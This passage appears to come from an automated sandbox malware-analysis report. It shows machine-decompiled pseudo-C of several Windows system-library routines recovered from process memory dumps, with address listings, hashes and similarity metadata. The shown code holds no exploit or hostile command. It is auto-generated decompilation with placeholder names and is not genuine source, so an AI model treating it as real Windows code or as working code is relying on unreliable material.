								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E04442280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L04444620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E0446F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E0443FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x451b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E0446B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































            0x04455142
            0x0445514c
            0x04455150
            0x04455157
            0x04455159
            0x0445515e
            0x04455165
            0x04455169
            0x0445516c
            0x04455172
            0x04455176
            0x0445517a
            0x0445517a
            0x0445517a
            0x0445517f
            0x04496d8b
            0x04496d8e
            0x04496d91
            0x04496d95
            0x04496d98
            0x04496d9c
            0x04496da0
            0x04496da3
            0x04496da7
            0x04496e26
            0x04496e26
            0x04496e2a
            0x044551f9
            0x044551f9
            0x044551fe
            0x04496e33
            0x04496e33
            0x04496e39
            0x04496e3d
            0x04496e46
            0x04496e50
            0x00000000
            0x00000000
            0x04496e52
            0x04496e53
            0x04496e56
            0x04496e5d
            0x00000000
            0x00000000
            0x00000000
            0x04496e5f
            0x04496e67
            0x04496e77
            0x04496e7f
            0x04496e80
            0x04496e88
            0x04496e90
            0x04496e9f
            0x04496ea5
            0x04496ea9
            0x04496eb1
            0x04496ebf
            0x00000000
            0x00000000
            0x04496ecf
            0x04496ed3
            0x00000000
            0x00000000
            0x04496edb
            0x04496ede
            0x04496ee1
            0x04496ee8
            0x04496eeb
            0x04496eed
            0x04496ef0
            0x04496ef4
            0x04496ef8
            0x04496efc
            0x00000000
            0x00000000
            0x04496f0d
            0x04496f11
            0x04496f32
            0x04496f37
            0x04496f3b
            0x04496f3e
            0x04496f41
            0x04496f46
            0x00000000
            0x00000000
            0x04496f4c
            0x04496f50
            0x04496f50
            0x04496f54
            0x04496f62
            0x04496f65
            0x04496f6d
            0x04496f7b
            0x04496f7b
            0x04496f93
            0x04496f98
            0x04496fa0
            0x04496fa6
            0x04496fb3
            0x04496fb6
            0x04496fbf
            0x04496fc1
            0x04496fd5
            0x04496fda
            0x04496fda
            0x04496fdd
            0x04496fe2
            0x04496fe7
            0x04496feb
            0x04496fef
            0x04496ff3
            0x0445520c
            0x0445520c
            0x0445520f
            0x04455215
            0x04455234
            0x0445523a
            0x0445523a
            0x04455244
            0x04455245
            0x04455246
            0x04455251
            0x04455251
            0x04496f13
            0x04496f17
            0x04496f17
            0x04496f18
            0x04496f1b
            0x04496f1f
            0x04496f23
            0x00000000
            0x04496f28
            0x04455204
            0x04455204
            0x04455208
            0x00000000
            0x04455208
            0x04455185
            0x04455188
            0x0445518a
            0x0445518e
            0x04455195
            0x04496db1
            0x04496db5
            0x04496db9
            0x0445519b
            0x0445519b
            0x0445519e
            0x044551a7
            0x044551a9
            0x044551a9
            0x044551b5
            0x044551b8
            0x044551bb
            0x044551be
            0x044551c1
            0x044551c5
            0x044551c9
            0x044551cd
            0x044551cd
            0x044551d8
            0x044551dc
            0x044551e0
            0x04496dcc
            0x04496dd0
            0x04496dd5
            0x04496ddd
            0x04496de1
            0x04496de1
            0x04496de5
            0x04496deb
            0x04496df1
            0x04496df7
            0x04496dfd
            0x04496e01
            0x04496e05
            0x04496e09
            0x04496e0d
            0x04496e11
            0x04496e11
            0x044551eb
            0x04496e1a
            0x04496e1f
            0x04496e21
            0x04496e23
            0x00000000
            0x044551f1
            0x044551f1
            0x00000000
            0x044551f1

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 42c0bab29cfcce9d9f433104e9ee3d1850ef130b9990f83e4003debfe4493f14
            • Instruction ID: fba2c1835f5953f5bf4970a3c636f58ed5bdcddbcaa0e215e3828e07a9ad96fe
            • Opcode Fuzzy Hash: 42c0bab29cfcce9d9f433104e9ee3d1850ef130b9990f83e4003debfe4493f14
            • Instruction Fuzzy Hash: C6C113755083819FDB54CF28C580A6AFBF1BF88308F144A6EF8998B362D775E945CB42
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0442C600, Relevance: .2, Instructions: 225COMMON
            Download Yara Rule
            C-Code - Quality: 67%
            			E0442C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x451d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E04436D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0446B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x4517b9c; // 0x0
					_t74 = L04444620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E04469650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L044477F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0446F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E044613C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L044477F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E04469650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}










































            0x0442c608
            0x0442c615
            0x0442c625
            0x0442c62d
            0x0442c635
            0x0442c640
            0x0442c680
            0x0442c687
            0x0442c688
            0x0442c689
            0x0442c694
            0x0442c694
            0x0442c642
            0x0442c64a
            0x0442c697
            0x04497a25
            0x04497a2b
            0x04497a2e
            0x04497a30
            0x04497bea
            0x04497bea
            0x00000000
            0x04497bea
            0x04497a36
            0x04497a43
            0x04497a48
            0x04497a4c
            0x04497a4e
            0x00000000
            0x00000000
            0x04497a58
            0x04497a5a
            0x04497a5b
            0x04497a5c
            0x04497a5d
            0x04497a63
            0x04497a64
            0x04497a6a
            0x04497a6c
            0x04497a6e
            0x044979cb
            0x044979cb
            0x044979ce
            0x044979d0
            0x04497a98
            0x04497a9b
            0x04497a9b
            0x04497a9e
            0x04497aa1
            0x04497bbe
            0x04497bbe
            0x04497bc0
            0x04497be0
            0x04497be0
            0x04497a01
            0x04497a01
            0x04497a05
            0x04497a07
            0x04497a15
            0x04497a15
            0x04497a1a
            0x00000000
            0x04497a1a
            0x04497bc2
            0x04497bc6
            0x04497bc9
            0x04497bcd
            0x04497bcf
            0x044979e6
            0x044979e6
            0x044979eb
            0x044979eb
            0x044979ef
            0x044979f1
            0x00000000
            0x00000000
            0x044979f3
            0x044979f5
            0x044979ff
            0x044979ff
            0x00000000
            0x044979ff
            0x044979f7
            0x044979fd
            0x00000000
            0x00000000
            0x00000000
            0x044979fd
            0x04497bd5
            0x04497bd8
            0x00000000
            0x00000000
            0x04497ba9
            0x04497bac
            0x04497bb0
            0x04497bb1
            0x04497bb1
            0x04497bb6
            0x00000000
            0x04497bb6
            0x04497aa7
            0x04497aaa
            0x00000000
            0x00000000
            0x04497ab2
            0x04497ab3
            0x04497ab5
            0x04497aec
            0x04497aef
            0x04497b25
            0x04497b28
            0x04497b62
            0x04497b64
            0x04497b8f
            0x04497b92
            0x04497b96
            0x04497b98
            0x00000000
            0x00000000
            0x04497b9e
            0x04497b9f
            0x04497ba3
            0x00000000
            0x04497ba3
            0x04497b66
            0x04497b68
            0x04497ae2
            0x04497ae2
            0x00000000
            0x04497ae2
            0x04497b6e
            0x04497b72
            0x04497b75
            0x04497b81
            0x04497b85
            0x04497b87
            0x00000000
            0x00000000
            0x04497b31
            0x04497b34
            0x04497b3c
            0x04497b45
            0x04497b46
            0x04497b4f
            0x04497b51
            0x04497b57
            0x04497b59
            0x04497b59
            0x00000000
            0x04497b59
            0x04497b77
            0x00000000
            0x04497b77
            0x04497b2a
            0x00000000
            0x04497b2a
            0x04497af1
            0x04497af3
            0x00000000
            0x00000000
            0x04497afb
            0x04497afc
            0x04497afe
            0x00000000
            0x00000000
            0x04497b00
            0x04497b03
            0x00000000
            0x00000000
            0x04497b05
            0x04497b09
            0x04497b0d
            0x04497b0f
            0x00000000
            0x00000000
            0x04497b18
            0x04497b1d
            0x00000000
            0x04497b1d
            0x04497ab7
            0x04497ab9
            0x00000000
            0x00000000
            0x04497abf
            0x04497ac1
            0x00000000
            0x00000000
            0x04497ac3
            0x04497ac6
            0x00000000
            0x00000000
            0x04497ac8
            0x04497acc
            0x04497ad0
            0x04497ad2
            0x00000000
            0x00000000
            0x04497adb
            0x00000000
            0x04497adb
            0x044979d6
            0x044979d9
            0x044979dc
            0x04497a91
            0x04497a94
            0x00000000
            0x04497a94
            0x044979e2
            0x00000000
            0x044979e2
            0x04497a74
            0x04497a7a
            0x00000000
            0x00000000
            0x04497a8a
            0x04497a21
            0x04497a21
            0x00000000
            0x04497a21
            0x0442c650
            0x0442c651
            0x0442c656
            0x0442c65c
            0x0442c65d
            0x0442c663
            0x0442c664
            0x0442c66a
            0x0442c66e
            0x044979c5
            0x044979c7
            0x00000000
            0x044979c7
            0x0442c67a
            0x00000000
            0x00000000
            0x00000000

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID: InitializeThunk
            • String ID:
            • API String ID: 2994545307-0
            • Opcode ID: 77b4a317bcb6c4ef4f77b107d22d4b6211e085ccf94fb73cbe40650093d69da6
            • Instruction ID: ccac49edf67ef52e0b686f0c1957062332f724a52dbe5e86e71de80704f28cc1
            • Opcode Fuzzy Hash: 77b4a317bcb6c4ef4f77b107d22d4b6211e085ccf94fb73cbe40650093d69da6
            • Instruction Fuzzy Hash: 3E815875624201DBDF25CE14C884A6BBBE4EF84354F14496FE9469B341E330FD45EBA2
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044BB8D0, Relevance: .2, Instructions: 199COMMON
            Download Yara Rule
            C-Code - Quality: 39%
            			E044BB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4517b9c; // 0x0
				_t124 = L04444620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04469800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E044695B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E044695D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L044477F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04469910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E044695D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4517b9c; // 0x0
									_t92 = L04444620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04469910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L044477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0442A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E044BE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E044BE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E044695B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















            0x044bb8d9
            0x044bb8e4
            0x00000000
            0x044bb8e6
            0x044bb8f3
            0x044bb8f5
            0x044bb8f5
            0x044bb8f8
            0x044bb920
            0x044bb924
            0x044bb936
            0x044bb939
            0x044bb93d
            0x044bb948
            0x044bb9a0
            0x044bb9a0
            0x044bb9a4
            0x044bb9bf
            0x044bb9c4
            0x044bb9c6
            0x044bb9cd
            0x044bb9d1
            0x044bbad4
            0x044bbad8
            0x044bbada
            0x044bbadc
            0x044bbadc
            0x044bbadf
            0x044bbae0
            0x044bbae2
            0x044bbae4
            0x044bbaec
            0x044bbaee
            0x044bbaf0
            0x044bbaf0
            0x044bbaec
            0x044bbafb
            0x044bbafc
            0x044bbafe
            0x044bbb01
            0x044bbb01
            0x00000000
            0x044bbb06
            0x044bb9d7
            0x044bb9db
            0x044bb9db
            0x044bb9de
            0x044bb9de
            0x044bb9e4
            0x044bb9e7
            0x044bb9ea
            0x044bb9ec
            0x044bb9ef
            0x044bb9f3
            0x044bba1b
            0x044bba1b
            0x044bba23
            0x044bba24
            0x044bba27
            0x044bba2a
            0x044bba2b
            0x044bba2e
            0x044bba30
            0x044bba37
            0x044bba3f
            0x044bba9c
            0x044bbaa2
            0x044bbb13
            0x044bbb15
            0x044bbaae
            0x044bbaae
            0x044bbab3
            0x044bbab5
            0x044bbaba
            0x044bbac8
            0x044bbac8
            0x044bbaba
            0x044bbacd
            0x044bbacf
            0x00000000
            0x044bbacf
            0x044bbb1a
            0x00000000
            0x044bbb1c
            0x044bbaa7
            0x044bbb11
            0x00000000
            0x044bbb11
            0x044bbaa9
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x044bba41
            0x044bba41
            0x044bba41
            0x044bba58
            0x044bba5d
            0x044bba62
            0x00000000
            0x00000000
            0x044bba64
            0x044bba67
            0x044bba68
            0x044bba69
            0x044bba6c
            0x044bba6f
            0x044bba71
            0x044bba78
            0x044bba80
            0x00000000
            0x00000000
            0x044bba90
            0x044bba90
            0x044bba97
            0x00000000
            0x044bba97
            0x044bb9f5
            0x044bb9f7
            0x044bb9f7
            0x044bb9fa
            0x044bba03
            0x044bba07
            0x044bba0c
            0x044bba10
            0x044bba17
            0x00000000
            0x044bb9f7
            0x044bb9a6
            0x044bb9a8
            0x044bb9af
            0x044bb9b3
            0x00000000
            0x00000000
            0x044bb9b9
            0x00000000
            0x044bb9b9
            0x044bb94d
            0x044bb98f
            0x044bb995
            0x044bb999
            0x044bb960
            0x044bb967
            0x044bb968
            0x044bb96a
            0x00000000
            0x044bb96a
            0x044bb99b
            0x044bb99e
            0x00000000
            0x00000000
            0x00000000
            0x044bb99e
            0x044bb951
            0x044bb954
            0x044bb95a
            0x044bb95e
            0x044bb972
            0x044bb979
            0x044bb97d
            0x044bb97f
            0x044bb980
            0x044bb982
            0x044bb984
            0x00000000
            0x044bb984
            0x00000000
            0x044bb926
            0x00000000
            0x044bb926

            Memory Dump Source
            • Source File: 00000012.00000002.571051613.0000000004400000.00000040.00000001.sdmp, Offset: 04400000, based on PE: true
            • Associated: 00000012.00000002.571192799.000000000451B000.00000040.00000001.sdmp Download File
            • Associated: 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp Download File
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d1c7ae312f158749879eaba83c86c2f14bb3f3163fbbf33ea7b3579505f36445
            • Instruction ID: bfd3476b7835b73f552c0a7eb28e8519e465be79b8b982329d8adef919f7c85b
            • Opcode Fuzzy Hash: d1c7ae312f158749879eaba83c86c2f14bb3f3163fbbf33ea7b3579505f36445
            • Instruction Fuzzy Hash: 27713332200B41EFEF31CF15C840F96B7A5EB44724F10492EE69587AA1EBB4F905DBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 044252A5, Relevance: .2, Instructions: 161COMMON
            Download Yara Rule
            C-Code - Quality: 80%
            			E044252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0443EEF0(0x45179a0);
					_t104 =  *0x4518210; // 0x172cb8
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x2e000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0443EB70(_t93, 0x45179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E04469890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0443EEF0(0x45179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0443EB70(0, 0x45179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0x172cd002
								_t13 = _t104 + 0xc; // 0x172cc5
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0445F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0443EEF0(0x45179a0);
									__eflags =  *0x4518210 - _t104; // 0x172cb8
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4518210 = _t102;
